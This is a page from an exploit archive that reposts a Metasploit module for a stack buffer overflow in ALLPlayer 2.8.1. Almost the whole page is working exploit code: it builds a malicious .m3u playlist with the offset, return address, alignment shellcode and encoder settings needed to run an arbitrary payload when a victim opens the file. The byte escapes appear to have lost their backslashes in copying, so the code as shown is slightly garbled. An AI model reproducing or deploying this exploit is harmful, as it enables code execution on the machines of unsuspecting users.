Home / exploitsPDF  

ALLPlayer M3U Buffer Overflow

Posted on 05 March 2014

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT

 def initialize(info = {})
 super(update_info(info,
 'Name' => 'ALLPlayer M3U Buffer Overflow',
 'Description' => %q{
 This module exploits a stack-based buffer overflow vulnerability in
 ALLPlayer 2.8.1, caused by a long string in a playlist entry.
 By persuading the victim to open a specially-crafted .M3U file, a
 remote attacker could execute arbitrary code on the system or cause
 the application to crash. This module has been tested successfully on
 Windows 7 SP1.
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
 'metacom', # Vulnerability discovery
 'Mike Czumak', # Original exploit
 'Gabor Seljan' # Metasploit module
 ],
 'References' =>
 [
 [ 'BID', '62926' ],
 [ 'BID', '63896' ],
 [ 'EDB', '28855' ],
 [ 'EDB', '29549' ],
 [ 'EDB', '29798' ],
 [ 'EDB', '32041' ],
 [ 'OSVDB', '98283' ],
 [ 'URL', 'http://www.allplayer.org/' ]
 ],
 'DefaultOptions' =>
 {
 'ExitFunction' => 'process'
 },
 'Platform' => 'win',
 'Payload' =>
 {
 'DisableNops' => true,
 'BadChars' => "x00x0ax0dx80x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9f",
 'Space' => 3060,
 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
 'EncoderOptions' =>
 {
 'BufferRegister' => 'EAX'
 }
 },
 'Targets' =>
 [
 [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
 {
 'Offset' => 301,
 'Ret' => "x50x45", # POP POP RET from ALLPlayer.exe
 'Nop' => "x6e" # ADD BYTE PTR DS:[ESI],CH
 }
 ]
 ],
 'Privileged' => false,
 'DisclosureDate' => 'Oct 09 2013',
 'DefaultTarget' => 0))

 register_options(
 [
 OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
 ],
 self.class)

 end

 def exploit
 nop = target['Nop']

 sploit = rand_text_alpha_upper(target['Offset'])
 sploit << "x61x50" # POPAD
 sploit << target.ret
 sploit << "x53" # PUSH EBX
 sploit << nop
 sploit << "x58" # POP EAX
 sploit << nop
 sploit << "x05x14x11" # ADD EAX,0x11001400
 sploit << nop
 sploit << "x2dx13x11" # SUB EAX,0x11001300
 sploit << nop
 sploit << "x50" # PUSH EAX
 sploit << nop
 sploit << "xc3" # RET
 sploit << nop * 109
 sploit << payload.encoded
 sploit << rand_text_alpha_upper(10000) # Generate exception

 # Create the file
 print_status("Creating '#{datastore['FILENAME']}' file ...")
 file_create("http://" + sploit)

 end
end

 

TOP

Malware :

Exploits :